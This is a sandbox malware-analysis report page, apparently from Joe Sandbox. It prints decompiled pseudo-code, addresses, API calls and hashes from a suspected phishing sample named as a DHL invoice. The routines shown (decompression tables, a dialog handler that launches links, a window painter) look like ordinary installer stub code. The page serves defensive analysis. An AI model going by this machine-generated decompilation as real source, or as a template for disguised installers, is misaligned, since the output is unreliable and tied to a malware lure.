0x0040778b
0x0040778d
0x00407791
0x00000000
0x00407791
0x00000000
0x00000000
0x00000000
0x004076dd
0x004076dd
0x004076e0
0x004076e7
0x004076ec
0x004076ef
0x00000000
0x004076dd
0x0040766c
0x00407640

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6e5cab2d0bf7698bdae054db21990c31fcebd81f7c740a7b631921d0cd6e3b
Instruction ID: 34855fb2682deb8042092b43f828aa3e625fb4f43d1e7d882369f70b8a17060e
Opcode Fuzzy Hash: 9a6e5cab2d0bf7698bdae054db21990c31fcebd81f7c740a7b631921d0cd6e3b
Instruction Fuzzy Hash: 09F17171A183418FCB04CF18C49076ABBE5FF89315F14896EE889EB286D778E941CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00406EA8 Relevance: .3, Instructions: 314
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00406EA8(signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, signed int* _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v60;
				signed int _v120;
				signed int _v124;
				void _v188;
				intOrPtr _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				void* _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				short _v246;
				char _v247;
				signed char _v248;
				signed int _t170;
				void* _t172;
				signed int _t173;
				signed int _t176;
				signed int _t179;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t189;
				intOrPtr* _t203;
				signed int _t204;
				short _t209;
				signed int _t216;
				signed char _t227;
				signed int _t233;
				signed int* _t237;
				signed int _t239;
				signed int _t240;
				signed int* _t242;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed char _t251;
				intOrPtr _t253;
				signed int _t254;
				signed int _t260;
				signed int _t262;
				signed char _t264;
				intOrPtr _t265;
				signed int _t266;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t279;
				void* _t280;
				void* _t281;
				signed int _t283;
				signed int _t284;
				signed int* _t287;
				signed int _t290;
				void* _t291;
				intOrPtr _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				intOrPtr _t297;
				signed int _t299;
				intOrPtr _t300;
				signed int _t301;
				void* _t304;
				signed int _t308;
				signed char* _t310;

				_t237 = _a4;
				_t297 = _a8;
				_t265 = _t297;
				_t240 = 0x10;
				memset( &_v188, 0, _t240 << 2);
				_t310 =  &(( &_v248)[0xc]);
				_t242 = _t237;
				do {
					_t170 =  *_t242;
					_t242 =  &(_t242[1]);
					_t310[0x4c + _t170 * 4] = _t310[0x4c + _t170 * 4] + 1;
					_t265 = _t265 - 1;
				} while (_t265 != 0);
				if(_v188 == _t297) {
					 *_a24 = 0;
					 *_a28 = 0;
					return 0;
				}
				_t287 = _a28;
				_t244 = 1;
				_t294 = 0;
				_t266 = 0xf;
				while(_t310[0x4c + _t244 * 4] == _t294) {
					_t244 = _t244 + 1;
					if(_t244 <= _t266) {
						continue;
					}
					break;
				}
				_v220 = _t244;
				_t172 =  >=  ?  *_t287 : _t244;
				while(_t310[0x4c + _t266 * 4] == _t294) {
					_t266 = _t266 - 1;
					if(_t266 != 0) {
						continue;
					}
					break;
				}
				_v216 = _t266;
				_t299 =  <=  ? _t172 : _t266;
				_t173 = _t299;
				_v236 = _t299;
				_t300 = _a8;
				 *_t287 = _t173;
				_t290 = 1 << _t244;
				while(_t244 < _t266) {
					_t291 = _t290 - _t310[0x4c + _t244 * 4];
					if(_t291 < 0) {
						L61:
						return _t173 | 0xffffffff;
					}
					_t244 = _t244 + 1;
					_t290 = _t291 + _t291;
				}
				_t246 = _t266 << 2;
				_v212 = _t246;
				_t173 = _t310[_t246 + 0x4c];
				_t292 = _t290 - _t173;
				_v192 = _t292;
				if(_t292 < 0) {
					goto L61;
				}
				_v120 = _t294;
				_t310[_t246 + 0x4c] = _t173 + _t292;
				_t247 = _t294;
				_t267 = _t266 - 1;
				if(_t267 != 0) {
					_t233 = _t294;
					do {
						_t247 = _t247 + _t310[_t233 + 0x50];
						_t233 = _t233 + 4;
						_t310[_t233 + 0x90] = _t247;
						_t267 = _t267 - 1;
					} while (_t267 != 0);
				}
				_t248 = _t294;
				do {
					_t268 =  *_t237;
					_t237 =  &(_t237[1]);
					if(_t268 != 0) {
						_t176 = _t310[0x8c + _t268 * 4];
						 *(0x4330a0 + _t176 * 4) = _t248;
						_t310[0x8c + _t268 * 4] = _t176 + 1;
					}
					_t248 = _t248 + 1;
				} while (_t248 < _t300);
				_t301 = _t294;
				_t249 = _v236;
				_t269 = _v220;
				_t239 =  ~_t249;
				_v232 = _t301;
				_t179 = _t310[_v212 + 0x8c];
				_v196 = _t179;
				_t180 = _t179 | 0xffffffff;
				_v124 = _t294;
				_v228 = 0x4330a0;
				_v244 = _t180;
				_v60 = _t294;
				_v224 = _t294;
				_v208 = _t294;
				if(_t269 <= _v216) {
					_t183 =  &_v188 + _t269 * 4;
					_v204 = _t183;
					do {
						_t184 =  *_t183;
						while(_t184 != 0) {
							_v200 = _t184;
							_v212 = _t184 - 1;
							_t173 = _t249 + _t239;
							while(1) {
								_v240 = _t173;
								if(_t269 <= _t173) {
									break;
								}
								_v244 = _v244 + 1;
								_t304 =  >  ? _t249 : _v216 - _t173;
								_t251 = _t269 - _t173;
								_t272 = 1 << _t251;
								if(1 > _v200) {
									_t280 = _t272 + (_t173 | 0xffffffff) - _v212;
									_t173 = _v204;
									if(_t251 < _t304) {
										while(1) {
											_t251 = _t251 + 1;
											if(_t251 >= _t304) {
												goto L31;
											}
											_t281 = _t280 + _t280;
											_t173 = _t173 + 4;
											if(_t281 >  *_t173) {
												_t280 = _t281 -  *_t173;
												continue;
											}
											goto L31;
										}
									}
								}
								L31:
								_v208 = 1;
								_t274 =  *_a36;
								_t308 = (1 << _t251) + _t274;
								if(1 > 0x5a0) {
									goto L61;
								}
								_v224 = _a32 + _t274 * 4;
								_t276 = _v244;
								_t310[0xcc + _t276 * 4] = _v224;
								 *_a36 = _t308;
								_t189 = _v240;
								_t301 = _v232;
								if(_t276 == 0) {
									 *_a24 = _v224;
								} else {
									_v247 = _v236;
									_v248 = _t251;
									_t310[0x8c + _t276 * 4] = _t301;
									_t279 = _t301 >> _t239;
									_t264 = _t310[0xc8 + _v244 * 4];
									_v246 = (_v224 - _t264 >> 2) - _t279;
									 *(_t264 + _t279 * 4) = _v248;
									_t189 = _v240;
								}
								_t249 = _v236;
								_t239 = _t189;
								_t269 = _v220;
								_t173 = _t189 + _t249;
							}
							_v247 = _t269 - _t239;
							if(_v228 < 0x4330a0 + _v196 * 4) {
								_t203 = _v228;
								_t253 =  *_t203;
								_t204 = _t203 + 4;
								_v232 = _t204;
								if(_t253 >= _a12) {
									_t254 = _t253 - _a12;
									_v248 =  *((intOrPtr*)(_a20 + _t254 * 2)) + 0x50;
									_t209 =  *((intOrPtr*)(_a16 + _t254 * 2));
								} else {
									_v248 = (_t204 & 0xffffff00 | _t253 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
									_t209 =  *_v228;
								}
								_v246 = _t209;
								_v228 = _v232;
							} else {
								_v248 = 0xc0;
							}
							_v200 = 1 << _t269 - _t239;
							_t283 = _t301 >> _t239;
							if(_t283 < _v208) {
								_t227 = _v248;
								_t262 = _v200;
								_t293 = _v224;
								do {
									 *(_t293 + _t283 * 4) = _t227;
									_t283 = _t283 + _t262;
								} while (_t283 < _v208);
								_t292 = _v192;
								_t294 = 0;
							}
							_t269 = _v220;
							_t216 = 1 << _t269 - 1;
							while((_t301 & _t216) != 0) {
								_t301 = _t301 ^ _t216;
								_t216 = _t216 >> 1;
							}
							_t301 = _t301 ^ _t216;
							_v232 = _t301;
							_t260 = _v244;
							if(((1 << _t239) - 0x00000001 & _t301) != _t310[0x8c + _t260 * 4]) {
								_t284 = _v236;
								_t295 = _t260;
								do {
									_t239 = _t239 - _t284;
									_t295 = _t295 - 1;
								} while (((1 << _t239) - 0x00000001 & _t301) != _t310[0x8c + _t295 * 4]);
								_t269 = _v220;
								_v244 = _t295;
								_t294 = 0;
							}
							_t184 = _v212;
							_t249 = _v236;
						}
						_t269 = _t269 + 1;
						_t183 = _v204 + 4;
						_v220 = _t269;
						_v204 = _t183;
					} while (_t269 <= _v216);
					_t180 = _t183 | 0xffffffff;
				}
				if(_t292 == 0 || _v216 == 1) {
					return _t294;
				}
				return _t180;
			}

0x00406eb1
0x00406eb9
0x00406ec0
0x00406ec6
0x00406ecb
0x00406ecb
0x00406ecd
0x00406ecf
0x00406ecf
0x00406ed1
0x00406ed4
0x00406ed8
0x00406ed8
0x00406ee1
0x00406eec
0x00406ef5
0x00000000
0x00406ef7
0x00406efe
0x00406f09
0x00406f0a
0x00406f0c
0x00406f0d
0x00406f13
0x00406f16
0x00000000
0x00000000
0x00000000
0x00406f16
0x00406f1c
0x00406f20
0x00406f23
0x00406f29
0x00406f2c
0x00000000
0x00000000
0x00000000
0x00406f2c
0x00406f30
0x00406f36
0x00406f39
0x00406f3b
0x00406f3f
0x00406f46
0x00406f4b
0x00406f5c
0x00406f4f
0x00406f53
0x0040727e
0x00000000
0x0040727e
0x00406f59
0x00406f5a
0x00406f5a
0x00406f62
0x00406f65
0x00406f69
0x00406f6d
0x00406f6f
0x00406f73
0x00000000
0x00000000
0x00406f7b
0x00406f82
0x00406f86
0x00406f88
0x00406f8b
0x00406f8d
0x00406f8f
0x00406f8f
0x00406f93
0x00406f96
0x00406f9d
0x00406f9d
0x00406f8f
0x00406fa2
0x00406fa4
0x00406fa4
0x00406fa6
0x00406fab
0x00406fad
0x00406fb4
0x00406fbc
0x00406fbc
0x00406fc3
0x00406fc4
0x00406fcc
0x00406fce
0x00406fd4
0x00406fd8
0x00406fda
0x00406fde
0x00406fe5
0x00406fe9
0x00406fec
0x00406ff3
0x00406ffb
0x00406fff
0x00407006
0x0040700a
0x00407012
0x0040701c
0x0040701f
0x00407023
0x00407023
0x0040724a
0x0040702a
0x0040702f
0x00407033
0x00407128
0x00407128
0x0040712e
0x00000000
0x00000000
0x0040703f
0x00407047
0x0040704e
0x00407051
0x00407057
0x00407060
0x00407062
0x00407068
0x0040706a
0x0040706a
0x0040706d
0x00000000
0x00000000
0x0040706f
0x00407071
0x00407076
0x00407078
0x00000000
0x00407078
0x00000000
0x00407076
0x0040706a
0x00407068
0x0040707c
0x00407088
0x0040708c
0x0040708e
0x00407096
0x00000000
0x00000000
0x004070a6
0x004070aa
0x004070b2
0x004070c0
0x004070c2
0x004070c6
0x004070cc
0x0040711a
0x004070ce
0x004070d2
0x004070da
0x004070e0
0x004070e9
0x004070eb
0x004070fd
0x00407106
0x00407109
0x00407109
0x0040711c
0x00407120
0x00407122
0x00407126
0x00407126
0x00407138
0x0040714b
0x00407154
0x00407158
0x0040715a
0x0040715d
0x00407168
0x00407184
0x00407197
0x004071a2
0x0040716a
0x00407177
0x0040717f
0x0040717f
0x004071a6
0x004071af
0x0040714d
0x0040714d
0x0040714d
0x004071c0
0x004071c4
0x004071ca
0x004071cc
0x004071d0
0x004071d4
0x004071d8
0x004071d8
0x004071db
0x004071dd
0x004071e3
0x004071e7
0x004071e7
0x004071e9
0x004071f3
0x004071fb
0x004071f7
0x004071f9
0x004071f9
0x004071ff
0x00407205
0x0040720c
0x0040721a
0x0040721c
0x00407220
0x00407222
0x00407224
0x0040722b
0x0040722f
0x00407238
0x0040723c
0x00407240
0x00407240
0x00407242
0x00407246
0x00407246
0x00407256
0x00407257
0x0040725a
0x0040725e
0x00407262
0x0040726c
0x0040726c
0x00407271
0x00000000
0x0040727a
0x0040728b

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e392d6b6b0d8d2976783d3b417d62ef8802b8105719cbf52046bc6543515951
Instruction ID: 458c99329ba390570ae49b1fba58edefd6773494dbefaa897816e029df8d06ab
Opcode Fuzzy Hash: 8e392d6b6b0d8d2976783d3b417d62ef8802b8105719cbf52046bc6543515951
Instruction Fuzzy Hash: 11C16771A0C3458FC718DF28D580A6ABBE1BBC9304F148A3EE59997380D734E916CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00403D8A Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 221
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403D8A() {
				struct HWND__* _t60;
				intOrPtr _t61;
				unsigned int _t66;
				signed short* _t88;
				unsigned int _t89;
				long _t104;
				intOrPtr _t117;
				intOrPtr _t118;
				int _t120;
				signed int _t121;
				struct HWND__* _t125;
				int _t126;
				int _t132;
				intOrPtr _t135;
				struct HWND__* _t137;
				struct HWND__* _t138;
				int _t139;
				void* _t142;

				if( *((intOrPtr*)(_t142 + 0x50)) != 0x110) {
					_t139 =  *(_t142 + 0x68);
					if( *(_t142 + 0x60) != 0x111) {
						if( *(_t142 + 0x60) != 0x4e) {
							if( *(_t142 + 0x60) == 0x40b) {
								 *0x42dd5c =  *0x42dd5c + 1;
							}
							L25:
							return E0040575B( *(_t142 + 0x68),  *(_t142 + 0x68), _t139);
						}
						_t60 = GetDlgItem( *(_t142 + 0x60), 0x3e8);
						_t117 =  *((intOrPtr*)(_t139 + 8));
						_t125 = _t60;
						if(_t117 != 0x70b) {
							L16:
							if(_t117 != 0x700 ||  *((intOrPtr*)(_t139 + 0xc)) != 0x100) {
								goto L25;
							} else {
								_t61 =  *((intOrPtr*)(_t139 + 0x10));
								if(_t61 == 0xd) {
									SendMessageW( *0x4349f8, 0x111, "true", 0);
									_t61 =  *((intOrPtr*)(_t139 + 0x10));
								}
								if(_t61 == 0x1b) {
									SendMessageW( *0x4349f8, 0x10, 0, 0);
								}
								return 1;
							}
						}
						if( *((intOrPtr*)(_t139 + 0xc)) != 0x201) {
							goto L25;
						}
						_t66 =  *(_t139 + 0x1c);
						_t118 =  *((intOrPtr*)(_t139 + 0x18));
						 *(_t142 + 0x14) = _t66;
						 *(_t142 + 0x10) = _t118;
						 *(_t142 + 0x18) = 0x4339a0;
						if(_t66 - _t118 >= 0x800) {
							goto L25;
						}
						SendMessageW(_t125, 0x44b, 0, _t142 + 0x10);
						SetCursor(LoadCursorW(0, 0x7f02));
						 *((intOrPtr*)(_t142 + 0x24)) =  *((intOrPtr*)(_t142 + 0x5c));
						 *(_t142 + 0x2c) =  *(_t142 + 0x18);
						 *((intOrPtr*)(_t142 + 0x24)) = 0x500;
						 *((intOrPtr*)(_t142 + 0x3c)) = 1;
						 *(_t142 + 0x2c) = L"open";
						 *((intOrPtr*)(_t142 + 0x34)) = 0;
						 *((intOrPtr*)(_t142 + 0x38)) = 0;
						E004069F3(_t142 + 0x1c);
						SetCursor(LoadCursorW(0, 0x7f00));
						_t117 =  *((intOrPtr*)(_t139 + 8));
						goto L16;
					}
					if( *(_t142 + 0x64) >> 0x10 == 0 &&  *0x42dd5c == 0) {
						_t135 =  *0x42dd4c;
						if(( *(_t135 + 0x14) & 0x00000020) != 0) {
							_t120 = SendMessageW(GetDlgItem( *(_t142 + 0x6c), 0x40a), 0xf0, 0, 0) & 0x00000001;
							 *(_t135 + 0x14) =  *(_t135 + 0x14) & 0xfffffffe | _t120;
							EnableWindow( *0x42dd54, _t120);
							E0040553C();
						}
					}
					goto L25;
				} else {
					_t126 =  *(_t142 + 0x68);
					_t121 =  *(_t126 + 0x30);
					if(_t121 < 0) {
						_t121 =  *( *0x4349e0 - 4 + _t121 * 4);
					}
					_push( *((intOrPtr*)(_t126 + 0x34)));
					_t88 =  *0x435a38 + _t121 * 2;
					_t89 =  &(_t88[1]);
					 *(_t142 + 0x64) = _t89;
					 *(_t142 + 0x14) = _t89;
					_t91 =  ==  ? E0040568C : E00405655;
					 *(_t142 + 0x68) =  *_t88 & 0x0000ffff;
					_t137 =  *(_t142 + 0x60);
					 *(_t142 + 0x18) = 0;
					_push(0x22);
					 *((intOrPtr*)(_t142 + 0x24)) =  ==  ? E0040568C : E00405655;
					_t132 = ( !( *(_t126 + 0x14) >> 5) |  *(_t126 + 0x14)) & 1;
					E0040551A(_t137);
					_push( *((intOrPtr*)( *(_t142 + 0x68) + 0x38)));
					_push(0x23);
					E0040551A(_t137);
					CheckDlgButton(_t137, (_t132 ^ 1) + 0x40a, 1);
					EnableWindow( *0x42dd54, _t132);
					_t138 = GetDlgItem(_t137, 0x3e8);
					E00405503(_t138);
					SendMessageW(_t138, 0x45b, 1, 0);
					_t104 =  *( *0x435a10 + 0x68);
					if(_t104 < 0) {
						_t104 = GetSysColor( ~_t104);
					}
					SendMessageW(_t138, 0x443, 0, _t104);
					SendMessageW(_t138, 0x445, 0, 0x4010000);
					SendMessageW(_t138, 0x435, 0, lstrlenW( *(_t142 + 0x60)));
					 *0x42dd5c = 0;
					SendMessageW(_t138, 0x449,  *(_t142 + 0x68), _t142 + 0x10);
					 *0x42dd5c = 0;
					return 0;
				}
			}

0x00403d99
0x00403ecc
0x00403ed0
0x00403f4a
0x00404065
0x00404067
0x00404067
0x0040406d
0x00000000
0x00404076
0x00403f59
0x00403f5f
0x00403f64
0x00403f6c
0x00404013
0x00404019
0x00000000
0x00404024
0x00404024
0x0040402a
0x0040403a
0x00404040
0x00404040
0x00404046
0x00404052
0x00404052
0x00000000
0x0040405a
0x00404019
0x00403f79
0x00000000
0x00000000
0x00403f7f
0x00403f82
0x00403f85
0x00403f8b
0x00403f8f
0x00403f9c
0x00000000
0x00000000
0x00403fae
0x00403fc9
0x00403fcf
0x00403fd7
0x00403fe0
0x00403fe8
0x00403ff0
0x00403ff8
0x00403ffc
0x00404000
0x0040400e
0x00404010
0x00000000
0x00404010
0x00403edc
0x00403eef
0x00403ef9
0x00403f23
0x00403f32
0x00403f35
0x00403f3b
0x00403f3b
0x00403ef9
0x00000000
0x00403d9f
0x00403d9f
0x00403da3
0x00403da8
0x00403db9
0x00403db9
0x00403dca
0x00403dcd
0x00403dd3
0x00403dd6
0x00403ddd
0x00403de6
0x00403de9
0x00403ded
0x00403df9
0x00403e00
0x00403e03
0x00403e07
0x00403e09
0x00403e12
0x00403e15
0x00403e18
0x00403e29
0x00403e36
0x00403e48
0x00403e4b
0x00403e5e
0x00403e65
0x00403e6a
0x00403e6f
0x00403e6f
0x00403e7d
0x00403e8b
0x00403e9e
0x00403ea4
0x00403eb5
0x00403eb7
0x00000000
0x00403ebd

APIs

CheckDlgButton.USER32(?,?,00000001), ref: 00403E29
EnableWindow.USER32(?), ref: 00403E36
GetDlgItem.USER32(?,000003E8), ref: 00403E42
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E5E
GetSysColor.USER32(?), ref: 00403E6F
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E7D
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E8B
lstrlenW.KERNEL32(?), ref: 00403E91
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E9E
SendMessageW.USER32(00000000,00000449,?,?), ref: 00403EB5
GetDlgItem.USER32(?,0000040A), ref: 00403F11
SendMessageW.USER32(00000000), ref: 00403F18
EnableWindow.USER32(00000000), ref: 00403F35
GetDlgItem.USER32(0000004E,000003E8), ref: 00403F59
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403FAE
LoadCursorW.USER32(00000000,00007F02), ref: 00403FC0
SetCursor.USER32(00000000), ref: 00403FC9

Part of subcall function 004069F3: ShellExecuteExW.SHELL32(?), ref: 00406A02

LoadCursorW.USER32(00000000,00007F00), ref: 0040400B
SetCursor.USER32(00000000), ref: 0040400E
SendMessageW.USER32(00000111,?,00000000), ref: 0040403A
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404052

Strings

N, xrefs: 00403F45
Call, xrefs: 00403F8F

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N
API String ID: 3270077613-3438112850
Opcode ID: 728db8931e19c03b61cc67d759c3f4433907f5a55aac7dcf5e4c8ff3a598ca13
Instruction ID: c65a3a36bb4725451a4dfe1d630424e4f24f9f71ba4400fdcb13afcf6ca1fe0a
Opcode Fuzzy Hash: 728db8931e19c03b61cc67d759c3f4433907f5a55aac7dcf5e4c8ff3a598ca13
Instruction Fuzzy Hash: A3817DB0604305AFD710AF25DC84A6B7BA9FF84744F01493EF641B62A1C778AD45CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00401000() {
				struct HDC__* _t64;
				void* _t82;
				void* _t92;
				struct HDC__* _t100;
				struct tagRECT _t102;
				long _t110;
				struct HWND__* _t120;
				void* _t126;
				void* _t128;
				intOrPtr _t131;
				void* _t133;

				if( *((intOrPtr*)(_t133 + 0x64)) == 0xf) {
					_t131 =  *0x435a10;
					_t64 = BeginPaint( *(_t133 + 0x74), _t133 + 0x24);
					 *(_t133 + 0x10) =  *(_t133 + 0x10) & 0x00000000;
					_t100 = _t64;
					GetClientRect( *(_t133 + 0x74), _t133 + 0x1c);
					_t120 =  *(_t133 + 0x28);
					 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0x00000000;
					_t102 =  *(_t133 + 0x20);
					 *(_t133 + 0x74) = _t120;
					while(_t102 < _t120) {
						_t116 = _t120 - _t102;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						 *(_t133 + 0x18) = (((( *(_t131 + 0x56) & 0x000000ff) * _t102 + ( *(_t131 + 0x52) & 0x000000ff) * (_t120 - _t102)) / _t120 & 0x000000ff) << 0x00000008 | (( *(_t131 + 0x55) & 0x000000ff) *  *(_t133 + 0x20) + ( *(_t131 + 0x51) & 0x000000ff) * _t116) /  *(_t133 + 0x74) & 0x000000ff) << 0x00000008 | (( *(_t131 + 0x54) & 0x000000ff) *  *(_t133 + 0x20) + ( *(_t131 + 0x50) & 0x000000ff) * _t116) /  *(_t133 + 0x74) & 0x000000ff;
						_t82 = CreateBrushIndirect(_t133 + 0x10);
						 *(_t133 + 0x28) =  *(_t133 + 0x28) + 4;
						_t126 = _t82;
						FillRect(_t100, _t133 + 0x20, _t126);
						DeleteObject(_t126);
						_t120 =  *(_t133 + 0x74);
						_t102 =  *(_t133 + 0x20) + 4;
						 *(_t133 + 0x20) = _t102;
					}
					if( *(_t131 + 0x58) != 0xffffffff) {
						_t128 = CreateFontIndirectW( *(_t131 + 0x34));
						 *(_t133 + 0x74) = _t128;
						if(_t128 != 0) {
							 *(_t133 + 0x24) = 0x10;
							 *(_t133 + 0x28) = 8;
							SetBkMode(_t100, "true");
							SetTextColor(_t100,  *(_t131 + 0x58));
							_t92 = SelectObject(_t100, _t128);
							DrawTextW(_t100, 0x434a00, 0xffffffff, _t133 + 0x20, 0x820);
							SelectObject(_t100, _t92);
							DeleteObject( *(_t133 + 0x74));
						}
					}
					EndPaint( *(_t133 + 0x74), _t133 + 0x2c);
					return 0;
				}
				_t110 =  *(_t133 + 0x6c);
				if( *((intOrPtr*)(_t133 + 0x64)) == 0x46) {
					 *(_t110 + 0x18) =  *(_t110 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t110 + 4)) =  *0x4349f8;
				}
				return DefWindowProcW( *(_t133 + 0x6c),  *(_t133 + 0x6c),  *(_t133 + 0x6c), _t110);
			}

0x00401008
0x0040103b
0x0040104c
0x00401052
0x00401057
0x00401062
0x00401068
0x0040106c
0x00401071
0x00401075
0x0040110f
0x00401087
0x00401096
0x004010b1
0x004010cc
0x004010db
0x004010df
0x004010e5
0x004010ea
0x004010f3
0x004010fa
0x00401104
0x00401108
0x0040110b
0x0040110b
0x0040111b
0x00401126
0x00401128
0x0040112e
0x00401133
0x0040113b
0x00401143
0x0040114d
0x0040115b
0x00401171
0x00401179
0x0040117f
0x0040117f
0x0040112e
0x0040118e
0x00000000
0x00401199
0x0040100f
0x00401013
0x00401015
0x0040101e
0x0040101e
0x00000000

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
BeginPaint.USER32(?,?), ref: 0040104C
GetClientRect.USER32(?,?), ref: 00401062
CreateBrushIndirect.GDI32(00000000), ref: 004010DF
FillRect.USER32(00000000,?,00000000), ref: 004010F3
DeleteObject.GDI32(00000000), ref: 004010FA
CreateFontIndirectW.GDI32(?), ref: 00401120
SetBkMode.GDI32(00000000,?), ref: 00401143
SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
SelectObject.GDI32(00000000,00000000), ref: 0040115B
DrawTextW.USER32(00000000,00434A00,000000FF,?,00000820), ref: 00401171
SelectObject.GDI32(00000000,00000000), ref: 00401179
DeleteObject.GDI32(?), ref: 0040117F
EndPaint.USER32(?,?), ref: 0040118E

Strings

F, xrefs: 0040100A

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
